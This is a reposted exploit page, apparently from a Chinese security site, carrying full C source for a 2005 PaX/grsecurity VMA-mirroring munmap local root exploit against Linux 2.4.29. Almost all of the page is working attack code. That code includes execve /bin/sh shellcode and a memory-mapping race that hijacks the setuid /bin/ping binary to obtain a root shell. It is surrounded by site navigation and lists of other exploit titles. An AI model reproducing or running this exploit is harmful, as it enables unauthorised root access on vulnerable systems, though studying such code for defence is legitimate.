首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PaX VMA Mirroring Unmapping Vulnerability Local Root Exploit
来源:Christophe Devine 作者:Christophe 发布时间:2005-03-15  

PaX VMA Mirroring Unmapping Vulnerability Local Root Exploit

/*
* PaX double-mirrored VMA munmap local root exploit
*
* Copyright (C) 2005 Christophe Devine
*
* This exploit has only been tested on Debian 3.0 running Linux 2.4.29
* patched with grsecurity-2.1.1-2.4.29-200501231159
*
* $ gcc paxomatic.c
* $ ./chpax -m a.out
* $ ./a.out
* ...
* usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]
* [-p pattern] [-s packetsize] [-t ttl] [-I interface address] host
* sh-2.05a#
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <unistd.h>
#include <signal.h>
#include <stdio.h>
#include <sched.h>

#include <sys/mman.h>
#include <sys/wait.h>
#include <asm/page.h>

#define MAXTRIES 64
#define PGD1_BASE 0x40000000
#define PGD2_BASE 0x50000000
#define PGD_SIZE (PAGE_SIZE * 1024)
#define MMTARGET (PGD1_BASE + PAGE_SIZE * 2)

unsigned char child_stack[PAGE_SIZE];

char exec_sh[] = /* from shellcode.org */

"\x31\xdb" /* xorl %ebx,%ebx */
"\x8d\x43\x17" /* leal 0x17(%ebx),%eax */
"\xcd\x80" /* int $0x80 */
"\x31\xd2" /* xorl %edx,%edx */
"\x52" /* pushl %edx */
"\x68\x6e\x2f\x73\x68" /* pushl $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* pushl $0x69622f2f */
"\x89\xe3" /* movl %esp,%ebx */
"\x52" /* pushl %edx */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\xb0\x0b" /* movb $0xb,%al */
"\xcd\x80"; /* int $0x80 */

int child_thread( void *arg )
{
char *argv[2], *envp[1];

argv[0] = (char *) arg;
argv[1] = NULL;
envp[0] = NULL;

execve( (char *) arg, argv, envp );

exit( 1 );
}

int main( void )
{
int i, j, n, pid, s;

for( i = 0; i < MAXTRIES; i++ )
{
printf( "Try %d of %d\n", i, MAXTRIES );

if( mmap( (void *) PGD1_BASE, PAGE_SIZE, PROT_READ, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 ) == (void *) -1 )
{
perror( "mmap pgd1 base\n" );
return( 1 );
}

if( mmap( (void *) PGD2_BASE, PAGE_SIZE, PROT_READ, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 ) == (void *) -1 )
{
perror( "mmap pgd2 base\n" );
return( 1 );
}

if( mprotect( (void *) PGD1_BASE, PAGE_SIZE,
PROT_READ | PROT_EXEC ) < 0 )
{
perror( "mprotect pgd1 base" );
fprintf( stderr, "run chpax -m on this executable\n" );
return( 1 );
}

if( mmap( (void *) MMTARGET, PAGE_SIZE * 2, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0 ) == (void *) -1 )
{
perror( "mmap target\n" );
return( 1 );
}

for( j = 0; j < 1; j++ )
{
memset( (void *) MMTARGET + PAGE_SIZE * j, 0x90, PAGE_SIZE );
n = 16 + ( sizeof( exec_sh ) & 0xFFF0 );
memcpy( (void *) MMTARGET + PAGE_SIZE * ( j + 1 ) - n, exec_sh, n );
}

if( mprotect( (void *) MMTARGET, PAGE_SIZE,
PROT_READ | PROT_EXEC ) < 0 )
{
perror( "mprotect target" );
return( 1 );
}

munmap( (void *) PGD1_BASE, PGD_SIZE );
munmap( (void *) PGD2_BASE, PGD_SIZE );

for( j = 0; j < 8; j++ )
{
if( ( pid = clone( child_thread, child_stack + PAGE_SIZE,
SIGCHLD | CLONE_VM, "/bin/ping" ) ) == -1 )
{
perror( "clone suid" );
return( 1 );
}

waitpid( pid, &s, 0 );

if( ! WEXITSTATUS(s) && ! WIFSIGNALED(s) )
{
printf( "hasta luego...\n" );
return( 0 );
}
}

fflush( stdout );
}

printf( "shit happens\n" );

return( 1 );
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Freeciv Server 2.0.0 beta 8 Re
·iSnooker v1.6.8 Local Password
·Frank McIngvale LuxMan Local B
·iPool v1.6.81 Local Password D
·Ethereal CDMA2000 A11 Dissecto
·GoodTech Telnet Server 5.x Rem
·phpBB User id Auth. Bypass and
·AWStats Remote Command Executi
·PaX VMA Mirroring Unmapping Vu
·OpenBSD TCP TIMESTAMP Remote D
·Ethereal IAPP Remote Buffer Ov
·LuxMan -f Option Buffer Overfl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved